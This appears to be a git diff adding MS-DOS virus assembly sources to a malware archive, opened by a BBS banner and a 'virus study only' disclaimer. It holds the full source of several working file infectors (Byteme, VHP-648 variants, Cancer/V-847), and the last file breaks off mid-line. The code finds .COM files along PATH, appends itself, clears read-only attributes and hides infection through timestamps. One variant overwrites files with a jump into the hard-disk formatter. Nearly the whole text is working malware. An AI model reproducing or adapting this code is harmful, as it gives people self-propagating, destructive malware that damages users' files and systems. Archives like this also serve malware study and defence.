Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; diff --git a/MSDOS/Virus.MSDOS.Unknown.byteme.asm b/MSDOS/Virus.MSDOS.Unknown.byteme.asm new file mode 100644 index 00000000..0fde67b1 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.byteme.asm @@ -0,0 +1,281 @@ +; Byteme Appending Note Vir -- Byte Me, Dude.... +; Written by The Weasel! + +virus_type equ 0 ; Appending Virus +is_encrypted equ 0 ; We're not encrypted +tsr_virus equ 0 ; We're not TSR + +code segment byte public + assume cs:code,ds:code,es:code,ss:code + org 0100h + +main proc near + db 0E9h,00h,00h ; Near jump (for compatibility) +start: call find_offset ; Like a PUSH IP +find_offset: pop bp ; BP holds old IP + sub bp,offset find_offset ; Adjust for length of host + + lea si,[bp + buffer] ; SI points to original start + mov di,0100h ; Push 0100h on to stack for + push di ; return to main program + movsw ; Copy the first two bytes + movsb ; Copy the third byte + + mov di,bp ; DI points to start of virus + + mov bp,sp ; BP points to stack + sub sp,128 ; Allocate 128 bytes on stack + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address on stack + + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer on stack + int 021h + + lea si,[di + data00] ; SI points to data + mov ah,0Eh ; BIOS display char. function +display_loop: lodsb ; Load the next char. into AL + or al,al ; Is the character a null? + je disp_strnend ; If it is, exit + int 010h ; BIOS video interrupt + jmp short display_loop ; Do the next character +disp_strnend: + + call search_files ; Find and infect a file + + +com_end: pop dx ; DX holds original DTA address + mov ah,01Ah ; DOS set DTA function + int 021h + + mov sp,bp ; Deallocate local buffer + + xor ax,ax ; + mov bx,ax ; + mov cx,ax ; + mov dx,ax ; Empty out the registers + mov si,ax ; + mov di,ax ; + mov bp,ax ; + + ret ; Return to original program +main endp + +search_files proc near + push bp ; Save BP + mov bp,sp ; BP points to local buffer + sub sp,64 ; Allocate 64 bytes on stack + + mov ah,047h ; DOS get current dir function + xor dl,dl ; DL holds drive # (current) + lea si,[bp - 64] ; SI points to 64-byte buffer + int 021h + + mov ah,03Bh ; DOS change directory function + lea dx,[di + root] ; DX points to root directory + int 021h + + call traverse ; Start the traversal + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 64] ; DX points to old directory + int 021h + + mov sp,bp ; Restore old stack pointer + pop bp ; Restore BP + ret ; Return to caller + +root db "\",0 ; Root directory +search_files endp + +traverse proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first function + mov cx,00010000b ; CX holds search attributes + lea dx,[di + all_files] ; DX points to "*.*" + int 021h + jc leave_traverse ; Leave if no files present + +check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory? + jne another_dir ; If not, try again + cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."? + je another_dir ;If so, keep going + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 98] ; DX points to new directory + int 021h + + call traverse ; Recursively call ourself + + pushf ; Save the flags + mov ah,03Bh ; DOS change directory function + lea dx,[di + up_dir] ; DX points to parent directory + int 021h + popf ; Restore the flags + + jnc done_searching ; If we infected then exit + +another_dir: mov ah,04Fh ; DOS find next function + int 021h + jnc check_dir ; If found check the file + +leave_traverse: + lea dx,[di + com_mask] ; DX points to "*.COM" + call find_files ; Try to infect a file +done_searching: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller + +up_dir db "..",0 ; Parent directory name +all_files db "*.*",0 ; Directories to search for +com_mask db "*.COM",0 ; Mask for all .COM files +traverse endp + +find_files proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + push dx ; Save file mask + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first file function + mov cx,00100111b ; CX holds all file attributes + pop dx ; Restore file mask +find_a_file: int 021h + jc done_finding ; Exit if no files found + call infect_file ; Infect the file! + jnc done_finding ; Exit if no error + mov ah,04Fh ; DOS find next file function + jmp short find_a_file ; Try finding another file + +done_finding: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller +find_files endp + +infect_file proc near + mov ah,02Fh ; DOS get DTA address function + int 021h + mov si,bx ; SI points to the DTA + + mov byte ptr [di + set_carry],0 ; Assume we'll fail + + cmp word ptr [si + 01Ah],(65279 - (finish - start)) + jbe size_ok ; If it's small enough continue + jmp infection_done ; Otherwise exit + +size_ok: mov ax,03D00h ; DOS open file function, r/o + lea dx,[si + 01Eh] ; DX points to file name + int 021h + xchg bx,ax ; BX holds file handle + + mov ah,03Fh ; DOS read from file function + mov cx,3 ; CX holds bytes to read (3) + lea dx,[di + buffer] ; DX points to buffer + int 021h + + mov ax,04202h ; DOS file seek function, EOF + cwd ; Zero DX _ Zero bytes from end + mov cx,dx ; Zero CX / + int 021h + + xchg dx,ax ; Faster than a PUSH AX + mov ah,03Eh ; DOS close file function + int 021h + xchg dx,ax ; Faster than a POP AX + + sub ax,finish - start + 3 ; Adjust AX for a valid jump + cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet? + je infection_done ; If equal then exit + mov byte ptr [di + set_carry],1 ; Success -- the file is OK + add ax,finish - start ; Re-adjust to make the jump + mov word ptr [di + new_jump + 1],ax ; Construct jump + + mov ax,04301h ; DOS set file attrib. function + xor cx,cx ; Clear all attributes + lea dx,[si + 01Eh] ; DX points to victim's name + int 021h + + mov ax,03D02h ; DOS open file function, r/w + int 021h + xchg bx,ax ; BX holds file handle + + mov ah,040h ; DOS write to file function + mov cx,3 ; CX holds bytes to write (3) + lea dx,[di + new_jump] ; DX points to the jump we made + int 021h + + mov ax,04202h ; DOS file seek function, EOF + cwd ; Zero DX _ Zero bytes from end + mov cx,dx ; Zero CX / + int 021h + + mov ah,040h ; DOS write to file function + mov cx,finish - start ; CX holds virus length + lea dx,[di + start] ; DX points to start of virus + int 021h + + mov ax,05701h ; DOS set file time function + mov cx,[si + 016h] ; CX holds old file time + mov dx,[si + 018h] ; DX holds old file date + int 021h + + mov ah,03Eh ; DOS close file function + int 021h + + mov ax,04301h ; DOS set file attrib. function + xor ch,ch ; Clear CH for file attribute + mov cl,[si + 015h] ; CX holds file's old attributes + lea dx,[si + 01Eh] ; DX points to victim's name + int 021h + +infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed + ret ; Return to caller + +set_carry db ? ; Set-carry-on-exit flag +buffer db 090h,0CDh,020h ; Buffer to hold old three bytes +new_jump db 0E9h,?,? ; New jump to virus +infect_file endp + + +data00 db "BYTE M. ",0 +  +vcl_marker db "[VCL]",0 ; VCL creation marker + + +note db "Byte Me, Loser..." + +finish label near + +code ends + end main diff --git a/MSDOS/Virus.MSDOS.Unknown.c-623.asm b/MSDOS/Virus.MSDOS.Unknown.c-623.asm new file mode 100644 index 00000000..caed7403 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.c-623.asm @@ -0,0 +1,319 @@ + name Virus + title Disassembly listing of the VHP-648 virus + .radix 16 + code segment + assume cs:code,ds:code + org 100 +environ equ 2C + +start: + jmp virus + . . . +virus: + push cx ;Save CX + mov dx,offset data ;Restore original first instruction + ; before each contamination +modify equ $-2 ;The instruction above is changed + cld + mov si,dx + add si,saveins-data ;Instruction saved there + mov di,offset start + mov cx,3 ;Move 3 bytes + rep movsb ;Do it + mov si,dx ;Keep SI pointed at data + + mov ah,30 ;Get DOS version + int 21 + cmp al,0 ;Less than 2.0? + jne skip1 + jmp exit ;Exit if so + +skip1: + push es ;Save ES + mov ah,2F ;Get current DTA in ES:BX + int 21 + mov word ptr [si+0],bx ;dtaadr + mov word ptr [si+2],es + pop es ;Restore ES + + mov dx,mydta-data + add dx,si + mov ah,1A ;Set DTA + int 21 + + push es ;Save ES & SI + push si + mov es,ds:[environ] ;Environment address + mov di,0 +n_00015A: ;Search 'PATH=' in the environment + pop si ;Restore data offset in SI + push si + add si,pathstr-data + lodsb + mov cx,8000 ;Maximum 32K in environment + repne scasb ;Search for first letter ('P') + mov cx,4 ;4 letters in 'PATH' +n_000169: + lodsb ;Search for next char + scasb + jne n_00015A ;If not found, search for next 'P' + loop n_000169 ;Loop until done + pop si ;Restore SI & ES + pop es + + mov [si+16],di ;Save 'PATH' offset in poffs + mov di,si + add di,fname-data ;Point SI & DI at '=' sign + mov bx,si ;Point BX at data area + add si,fname-data + mov di,si + jmp short n_0001BF + +n_000185: + cmp word ptr [si+16],6C ;poffs + jne n_00018F + jmp olddta +n_00018F: + push ds + push si + mov ds,es:[environ] + mov di,si + mov si,es:[di+16] ;poffs + add di,fname-data +n_0001A1: + lodsb + cmp al,';' + je n_0001B0 + cmp al,0 + je n_0001AD + stosb + jmp n_0001A1 +n_0001AD: + mov si,0 +n_0001B0: + pop bx + pop ds + mov [bx+16],si ;poffs + cmp byte ptr [di-1],'\' + je n_0001BF + mov al,'\' ;Add '\' if not already present + stosb + +n_0001BF: + mov [bx+18],di ;Save '=' offset in eqoffs + mov si,bx ;Restore data pointer in SI + add si,allcom-data + mov cx,6 ;6 bytes in ASCIIZ '*.COM' + rep movsb ;Move '*.COM' at fname + mov si,bx ;Restore SI + + mov ah,4E ;Find first file + mov dx,fname-data + add dx,si + mov cx,11b ;Hidden, Read/Only or Normal files + int 21 + jmp short n_0001E3 + +findnext: + mov ah,4F ;Find next file + int 21 +n_0001E3: + jnc n_0001E7 ;If found, try to contaminate it + jmp n_000185 ;Otherwise search in another directory + +n_0001E7: + mov ax,[si+75] ;Check file time + and al,11111b ; (the seconds, more exactly) + cmp al,62d/2 ;Are they 62? + +;If so, file is already contains the virus, search for another: + + je findnext + cmp [si+79],64000d ;Is file size greather than 64,000 bytes? + ja findnext ;If so, search for next file + cmp word ptr [si+79],10d ;Is file size less than 10 bytes? + jb findnext ;If so, search for next file + + mov di,[si+18] ;eqoffs + push si ;Save SI + add si,namez-data ;Point SI at namez +n_000209: + lodsb + stosb + cmp al,0 + jne n_000209 + + pop si ;Restore SI + mov ax,4300 ;Get file attributes + mov dx,fname-data + add dx,si + int 21 + + mov [si+8],cx ;Save them in fattrib + mov ax,4301 ;Set file attributes + +;The next `db's are there because MASM can't assemble +; the instruction `and cx,0FFFE' correctly (the fool!): + + and cx,0FFFE ;Turn off Read Only flag + mov dx,fname-data + add dx,si + int 21 + + mov ax,3D02 ;Open file with Read/Write access + mov dx,fname-data + add dx,si + int 21 + jnc n_00023E + jmp oldattr ;Exit on error +n_00023E: + mov bx,ax ;Save file handle in BX + mov ax,5700 ;Get file date & time + int 21 + mov [si+4],cx ;Save time in ftime + mov [si+6],dx ;Save date in fdate + + mov ah,2C ;Get system time + int 21 + and dh,111b ;Are seconds a multiple of 8? + +;If so, destroy file (don't contaminate). Now this code is disabled. + + jmp short n_000266 ;CHANGED. Was jnz here + +;Destroy file by rewriting an illegal jmp as first instruction: + + mov ah,40 ;Write to file handle + mov cx,5 ;Write 5 bytes + mov dx,si + add dx,bad_jmp-data ;Write THESE bytes + int 21 ;Do it + jmp short oldtime ;Exit + +;Try to contaminate file: + +;Read first instruction of the file (first 3 bytes) and save it in saveins: + +n_000266: + mov ah,3F ;Read from file handle + mov cx,3 ;Read 3 bytes + mov dx,saveins-data ;Put them there + add dx,si + int 21 + jc oldtime ;Exit on error + cmp ax,3 ;Are really 3 bytes read? + jne oldtime ;Exit if not + +;Move file pointer to end of file: + + mov ax,4202 ;LSEEK from end of file + mov cx,0 ;0 bytes from end + mov dx,0 + int 21 + jc oldtime ;Exit on error + + mov cx,ax ;Get the value of file pointer + sub ax,3 ;Subtract 3 from it to get real code size + mov [si+14d],ax ;Save result in filloc + add cx,data-(virus-100) + mov di,si + sub di,data-modify ;A little self-modification + mov [di],cx + + mov ah,40 ;Write to file handle + mov cx,enddata-virus ;Virus code length as bytes to be written + mov dx,si + sub dx,data-virus ;Now DX points at virus label + int 21 + jc oldtime ;Exit on error + cmp ax,enddata-virus ;Are all bytes written? + jne oldtime ;Exit if not + + mov ax,4200 ;LSEEK from the beginning of the file + mov cx,0 ;Just at the file beginning + mov dx,0 + int 21 + jc oldtime ;Exit on error + +;Rewrite the first instruction of the file with a jump to the virus code: + + mov ah,40 ;Write to file handle + mov cx,3 ;3 bytes to write + mov dx,si + add dx,newjmp-data ;Write THESE bytes + int 21 + +oldtime: + mov dx,[si+6] ;Restore file date + mov cx,[si+4] ; and time + +;And these again are due to the MASM 5.0 foolness: + + db 081,0E1,0E0,0FF + db 081,0C9,01F,000 +; and cx,not 11111b +; or cx,11111b ;Set seconds to 62 (?!) + + mov ax,5701 ;Set file date & time + int 21 + mov ah,3E ;Close file handle + int 21 + +oldattr: + mov ax,4301 ;Set file attributes + mov cx,[si+8] ;They were saved in fattrib + mov dx,fname-data + add dx,si + int 21 + +olddta: + push ds ;Save DS + mov ah,1A ;Set DTA + mov dx,[si+0] ;Restore saved DTA + mov ds,[si+2] + int 21 + pop ds ;Restore DS + +exit: + pop cx ;Restore CX + xor ax,ax ;Clear registers + xor bx,bx + xor dx,dx + xor si,si + mov di,100 ;Jump to CS:100 + push di ; by doing funny RET + xor di,di + ret -1 + +data label byte ;Data section +dtaaddr dd ? ;Disk Transfer Address +ftime dw ? ;File date +fdate dw ? ;File time +fattrib dw ? ;File attribute +saveins db 0EBh,0Fh,90 ;Original first 3 bytes +newjmp db 0E9 ;Code of jmp instruction +filloc dw ? ;File pointer is saved here +allcom db '*.COM',0 ;Filespec to search for +poffs dw ? ;Address of 'PATH' string +eqoffs dw ? ;Address of '=' sign +pathstr db 'PATH=' +fname db 40 dup (' ') ;Path name to search for + +;Disk Transfer Address for Find First / Find Next: + +mydta label byte +drive db ? ;Drive to search for +pattern db 13d dup (?) ;Search pattern +reserve db 7 dup (?) ;Not used +attrib db ? ;File attribute +time dw ? ;File time +date dw ? ;File date +fsize dd ? ;File size +namez db 13d dup (?) ;File name found + +;This replaces the first instruction of a destroyed file: + +bad_jmp db 0EA,0Bh,2,13,58 +enddata label byte + code ends + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.c-627.asm b/MSDOS/Virus.MSDOS.Unknown.c-627.asm new file mode 100644 index 00000000..a288edaa --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.c-627.asm @@ -0,0 +1,330 @@ + name Virus + title Virus; based on the famous VHP-648 virus + .radix 16 + code segment + assume cs:code,ds:code + org 100 +environ equ 2C + +start: + jmp virus + int 20 + +data label byte ;Data section +dtaaddr dd ? ;Disk Transfer Address +ftime dw ? ;File date +fdate dw ? ;File time +fattrib dw ? ;File attribute +saveins db 3 dup (90) ;Original first 3 bytes +newjmp db 0E9 ;Code of jmp instruction +codeptr dw ? ;Here is formed a jump to virus code +allcom db '*.COM',0 ;Filespec to search for +poffs dw ? ;Address of 'PATH' string +eqoffs dw ? ;Address of '=' sign +pathstr db 'PATH=' +fname db 40 dup (' ') ;Path name to search for + +;Disk Transfer Address for Find First / Find Next: + +mydta label byte +drive db ? ;Drive to search for +pattern db 13d dup (?) ;Search pattern +reserve db 7 dup (?) ;Not used +attrib db ? ;File attribute +time dw ? ;File time +date dw ? ;File date +fsize dd ? ;File size +namez db 13d dup (?) ;File name found + +;This replaces the first instruction of a destroyed file. +;It's a jmp instruction into the hard disk formatting program (IBM XT only): + +bad_jmp db 0EA,0,0,0,0C8 +errhnd dd ? + +virus: + push cx ;Save CX + mov dx,offset data ;Restore original first instruction +modify equ $-2 ;The instruction above is changed + ;before each contamination + cld + mov si,dx + add si,saveins-data ;Instruction saved there + mov di,offset start + mov cx,3 ;Move 3 bytes + rep movsb ;Do it + mov si,dx ;Keep SI pointed at data + + mov ah,30 ;Get DOS version + int 21 + cmp al,0 ;Less than 2.0? + jne skip1 + jmp exit ;Exit if so + +skip1: + push es ;Save ES + mov ah,2F ;Get current DTA in ES:BX + int 21 + mov [si+dtaaddr-data],bx ;Save it in dtaaddr + mov [si+dtaaddr+2-data],es + + mov ax,3524 ;Get interrupt 24h handler + int 21 ; and save it in errhnd + mov [si+errhnd-data],bx + mov [si+errhnd+2-data],es + pop es ;Restore ES + + mov ax,2524 ;Set interrupt 24h handler + mov dx,si + add dx,handler-data + int 21 + + mov dx,mydta-data + add dx,si + mov ah,1A ;Set DTA + int 21 + + push es ;Save ES & SI + push si + mov es,ds:[environ] ;Environment address + xor di,di +n_00015A: ;Search 'PATH' in environment + pop si ;Restore data offset in SI + push si + add si,pathstr-data + lodsb + mov cx,8000 ;Maximum 32K in environment + repne scasb ;Search for first letter ('P') + mov cx,4 ;4 letters in 'PATH' +n_000169: + lodsb ;Search for next char + scasb + jne n_00015A ;If not found, search for next 'P' + loop n_000169 ;Loop until done + pop si ;Restore SI & ES + pop es + + mov [si+poffs-data],di ;Save 'PATH' offset in poffs + mov bx,si ;Point BX at data area + add si,fname-data ;Point SI & DI at fname + mov di,si + jmp short n_0001BF + +n_000185: + cmp word ptr [si+poffs-data],6C + jne n_00018F + jmp olddta +n_00018F: + push ds + push si + mov ds,es:[environ] + mov di,si + mov si,es:[di+poffs-data] + add di,fname-data +n_0001A1: + lodsb + cmp al,';' + je n_0001B0 + cmp al,0 + je n_0001AD + stosb + jmp n_0001A1 +n_0001AD: + xor si,si +n_0001B0: + pop bx + pop ds + mov [bx+poffs-data],si + cmp byte ptr [di-1],'\' + je n_0001BF + mov al,'\' ;Add '\' if not already present + stosb + +n_0001BF: + mov [bx+eqoffs-data],di ;Save '=' offset in eqoffs + mov si,bx ;Restore data pointer in SI + add si,allcom-data + mov cl,6 ;6 bytes in ASCIIZ '*.COM' + rep movsb ;Move '*.COM' at fname + mov si,bx ;Restore SI + + mov ah,4E ;Find first file + mov dx,fname-data + add dx,si + mov cl,11b ;Hidden, Read/Only or Normal files + int 21 + jmp short n_0001E3 + +findnext: + mov ah,4F ;Find next file + int 21 +n_0001E3: + jnc n_0001E7 ;If found, try to contaminate it + jmp n_000185 ;Otherwise search in another directory + +n_0001E7: + mov ax,[si+time-data] ;Check file time + and al,11111b ; (the seconds, more exactly) + cmp al,62d/2 ;Are they 62? + +;If so, file is already contains the virus, search for another: + + je findnext + +;Is file size greather than 64,000 bytes? + + cmp [si+fsize-data],64000d + ja findnext ;If so, search for next file + +;Is file size less than 10 bytes? + + cmp word ptr [si+fsize-data],10d + jb findnext ;If so, search for next file + + mov di,[si+eqoffs-data] + push si ;Save SI + add si,namez-data ;Point SI at namez +n_000209: + lodsb + stosb + cmp al,0 + jne n_000209 + + pop si ;Restore SI + mov ax,4300 ;Get file attributes + mov dx,fname-data + add dx,si + int 21 + + mov [si+fattrib-data],cx ;Save them in fattrib + mov ax,4301 ;Set file attributes + and cl,not 1 ;Turn off Read Only flag + int 21 + + mov ax,3D02 ;Open file with Read/Write access + int 21 + jnc n_00023E + jmp oldattr ;Exit on error + +n_00023E: + mov bx,ax ;Save file handle in BX + mov ax,5700 ;Get file date & time + int 21 + mov [si+ftime-data],cx ;Save time in ftime + mov [si+fdate-data],dx ;Save date in fdate + + mov ah,2C ;Get system time + int 21 + and dh,111b ;Are seconds a multiple of 8? + jnz n_000266 ;If not, contaminate file (don't destroy): + +;Destroy file by rewriting an illegal jmp as first instruction: + + mov ah,40 ;Write to file handle + mov cx,5 ;Write 5 bytes + mov dx,si + add dx,bad_jmp-data ;Write THESE bytes + int 21 ;Do it + jmp short oldtime ;Exit + +;Try to contaminate file: + +;Read first instruction of the file (first 3 bytes) and save it in saveins: + +n_000266: + mov ah,3F ;Read from file handle + mov cx,3 ;Read 3 bytes + mov dx,saveins-data ;Put them there + add dx,si + int 21 + jc oldtime ;Exit on error + cmp ax,3 ;Are really 3 bytes read? + jne oldtime ;Exit if not + +;Move file pointer to end of file: + + mov ax,4202 ;LSEEK from end of file + xor cx,cx ;0 bytes from end + xor dx,dx + int 21 + jc oldtime ;Exit on error + + mov cx,ax ;Get the value of file pointer (file size) + add ax,virus-data-3 ;Add virus data length to get code offset + mov [si+codeptr-data],ax ;Save result in codeptr + inc ch ;Add 100h to CX + mov di,si + add di,modify-data ;A little self-modification + mov [di],cx + + mov ah,40 ;Write to file handle + mov cx,endcode-data ;Virus code length as bytes to be written + mov dx,si ;Write from data to endcode + int 21 + jc oldtime ;Exit on error + cmp ax,endcode-data ;Are all bytes written? + jne oldtime ;Exit if not + + mov ax,4200 ;LSEEK from the beginning of the file + xor cx,cx ;Just at the file beginning + xor dx,dx + int 21 + jc oldtime ;Exit on error + +;Rewrite the first instruction of the file with a jump to the virus code: + + mov ah,40 ;Write to file handle + mov cl,3 ;3 bytes to write + mov dx,si + add dx,newjmp-data ;Write THESE bytes + int 21 + +oldtime: + mov dx,[si+fdate-data] ;Restore file date + mov cx,[si+ftime-data] ; and time + and cl,not 11111b + or cl,11111b ;Set seconds to 62 (?!) + + mov ax,5701 ;Set file date & time + int 21 + mov ah,3E ;Close file handle + int 21 + +oldattr: + mov ax,4301 ;Set file attributes + mov cx,[si+fattrib-data] ;They were saved in fattrib + mov dx,fname-data + add dx,si + int 21 + +olddta: + push ds ;Save DS + mov ah,1A ;Set DTA + mov dx,[si+dtaaddr-data] ;Restore saved DTA + mov ds,[si+dtaaddr+2-data] + int 21 + + mov ax,2524 ;Set interrupt 24h handler + mov dx,[si+errhnd-data] ;Restore saved handler + mov ds,[si+errhnd+2-data] + int 21 + pop ds ;Restore DS + +exit: + pop cx ;Restore CX + xor ax,ax ;Clear registers + xor bx,bx + xor dx,dx + xor si,si + mov di,100 ;Jump to CS:100 + push di ; by doing funny RET + xor di,di + ret -1 + +handler: ;Critical error handler + mov al,0 ;Just ignore error + iret ; and return + +endcode label byte + code ends + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.c-740.asm b/MSDOS/Virus.MSDOS.Unknown.c-740.asm new file mode 100644 index 00000000..8892ea8e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.c-740.asm @@ -0,0 +1,127 @@ + page ,132 + name CANCER + title Cancer - a mutation of the V-847 virus + .radix 16 + code segment + assume cs:code,ds:code + org 100 + +olddta equ 80 +virlen equ offset endcode - offset start +smalcod equ offset endcode - offset transf +buffer equ offset endcode + 100 +newdta equ offset endcode + 10 +fname = newdta + 1E +virlenx = offset endcode - offset start + +start: + jmp cancer + +ident dw 'VI' +counter db 0 +allcom db '*.COM',0 +vleng db virlen +n_10D db 3 ;Unused +progbeg dd ? +eof dw ? +handle dw ? + +cancer: + mov ax,cs ;Move program code + add ax,1000 ; 64K bytes forward + mov es,ax + inc [counter] + mov si,offset start + xor di,di + mov cx,virlen + rep movsb + + mov dx,newdta ;Set new Disk Transfer Address + mov ah,1A ;Set DTA + int 21 + mov dx,offset allcom ;Search for '*.COM' files + mov cx,110b ;Normal, Hidden or System + mov ah,4E ;Find First file + int 21 + jc done ;Quit if none found + +mainlp: + mov dx,offset fname + mov ax,3D02 ;Open file in Read/Write mode + int 21 + mov [handle],ax ;Save handle + mov bx,ax + push es + pop ds + mov dx,buffer + mov cx,0FFFF ;Read all bytes + mov ah,3F ;Read from handle + int 21 ;Bytes read in AX + add ax,buffer + mov cs:[eof],ax ;Save pointer to the end of file + + xor cx,cx ;Go to file beginning + mov dx,cx + mov bx,cs:[handle] + mov ax,4200 ;LSEEK from the beginning of the file + int 21 + jc close ;Leave this file if error occures + + mov dx,0 ;Write the whole code (virus+file) + mov cx,cs:[eof] ; back onto the file + mov bx,cs:[handle] + mov ah,40 ;Write to handle + int 21 + +close: + mov bx,cs:[handle] + mov ah,3E ;Close the file + int 21 + + push cs + pop ds ;Restore DS + mov ah,4F ;Find next matching file + mov dx,newdta + int 21 + jc done ;Exit if all found + jmp mainlp ;Otherwise loop again + +done: + mov dx,olddta ;Restore old Disk Transfer Address + mov ah,1A ;Set DTA + int 21 + + mov si,offset transf ;Move this part of code + mov cx,smalcod ;Code length + xor di,di ;Move to ES:0 + rep movsb ;Do it + + xor di,di ;Clear DI + mov word ptr cs:[progbeg],0 + mov word ptr cs:[progbeg+2],es ;Point progbeg at program start + jmp cs:[progbeg] ;Jump at program start + +transf: + push ds + pop es + mov si,buffer+100 + cmp [counter],1 + jne skip + sub si,200 +skip: + mov di,offset start + mov cx,0FFFF ;Restore original program's code + sub cx,si + rep movsb + mov word ptr cs:[start],offset start + mov word ptr cs:[start+2],ds + jmp dword ptr cs:[start] ;Jump to program start +endcode label byte + + int 20 ;Dummy program + int 20 ;??? + + db 0 ;Unused + +code ends + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.c-740b.asm b/MSDOS/Virus.MSDOS.Unknown.c-740b.asm new file mode 100644 index 00000000..8892ea8e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.c-740b.asm @@ -0,0 +1,127 @@ + page ,132 + name CANCER + title Cancer - a mutation of the V-847 virus + .radix 16 + code segment + assume cs:code,ds:code + org 100 + +olddta equ 80 +virlen equ offset endcode - offset start +smalcod equ offset endcode - offset transf +buffer equ offset endcode + 100 +newdta equ offset endcode + 10 +fname = newdta + 1E +virlenx = offset endcode - offset start + +start: + jmp cancer + +ident dw 'VI' +counter db 0 +allcom db '*.COM',0 +vleng db virlen +n_10D db 3 ;Unused +progbeg dd ? +eof dw ? +handle dw ? + +cancer: + mov ax,cs ;Move program code + add ax,1000 ; 64K bytes forward + mov es,ax + inc [counter] + mov si,offset start + xor di,di + mov cx,virlen + rep movsb + + mov dx,newdta ;Set new Disk Transfer Address + mov ah,1A ;Set DTA + int 21 + mov dx,offset allcom ;Search for '*.COM' files + mov cx,110b ;Normal, Hidden or System + mov ah,4E ;Find First file + int 21 + jc done ;Quit if none found + +mainlp: + mov dx,offset fname + mov ax,3D02 ;Open file in Read/Write mode + int 21 + mov [handle],ax ;Save handle + mov bx,ax + push es + pop ds + mov dx,buffer + mov cx,0FFFF ;Read all bytes + mov ah,3F ;Read from handle + int 21 ;Bytes read in AX + add ax,buffer + mov cs:[eof],ax ;Save pointer to the end of file + + xor cx,cx ;Go to file beginning + mov dx,cx + mov bx,cs:[handle] + mov ax,4200 ;LSEEK from the beginning of the file + int 21 + jc close ;Leave this file if error occures + + mov dx,0 ;Write the whole code (virus+file) + mov cx,cs:[eof] ; back onto the file + mov bx,cs:[handle] + mov ah,40 ;Write to handle + int 21 + +close: + mov bx,cs:[handle] + mov ah,3E ;Close the file + int 21 + + push cs + pop ds ;Restore DS + mov ah,4F ;Find next matching file + mov dx,newdta + int 21 + jc done ;Exit if all found + jmp mainlp ;Otherwise loop again + +done: + mov dx,olddta ;Restore old Disk Transfer Address + mov ah,1A ;Set DTA + int 21 + + mov si,offset transf ;Move this part of code + mov cx,smalcod ;Code length + xor di,di ;Move to ES:0 + rep movsb ;Do it + + xor di,di ;Clear DI + mov word ptr cs:[progbeg],0 + mov word ptr cs:[progbeg+2],es ;Point progbeg at program start + jmp cs:[progbeg] ;Jump at program start + +transf: + push ds + pop es + mov si,buffer+100 + cmp [counter],1 + jne skip + sub si,200 +skip: + mov di,offset start + mov cx,0FFFF ;Restore original program's code + sub cx,si + rep movsb + mov word ptr cs:[start],offset start + mov word ptr cs:[start+2],ds + jmp dword ptr cs:[start] ;Jump to program start +endcode label byte + + int 20 ;Dummy program + int 20 ;??? + + db 0 ;Unused + +code ends + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.c-847.asm b/MSDOS/Virus.MSDOS.Unknown.c-847.asm new file mode 100644 index 00000000..7405a6e8 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.c-847.asm @@ -0,0 +1,149 @@ + page ,132 + name V847 + title The V-847 virus + .radix 16 + code segment + assume cs:code,ds:code + org 100 + +timer equ 6C +olddta equ 80 +virlen equ offset endcode - offset start +smalcod equ offset endcode - offset transf +buffer equ offset endcode + 100 +newdta equ offset endcode + 10 +fname = newdta + 1E +virlenx = offset endcode - offset start +newid = offset ident + virlenx + 100 + +start: + jmp virus + +ident dw 'VI' +counter db 0 +allcom db '*.COM',0 +vleng dw 44F ;Unused +progbeg dd 10000h +eof dw ? +handle dw ? + +virus: + mov ax,cs ;Move program code + add ax,1000 ; 64K bytes forward + mov es,ax + inc [counter] + mov si,offset start + xor di,di + mov cx,virlen + rep movsb + + mov dx,newdta ;Set new Disk Transfer Address + mov ah,1A ;Set DTA + int 21 + mov dx,offset allcom ;Search for '*.COM' files + mov cx,110b ;Normal, Hidden or System + mov ah,4E ;Find First file + int 21 + jc done ;Quit if none found + +mainlp: + mov dx,offset fname + mov ax,3D02 ;Open file in Read/Write mode + int 21 + mov [handle],ax ;Save handle + mov bx,ax + push es + pop ds + mov dx,buffer + mov cx,0FFFF ;Read all bytes + mov ah,3F ;Read from handle + int 21 ;Bytes read in AX + add ax,buffer + mov 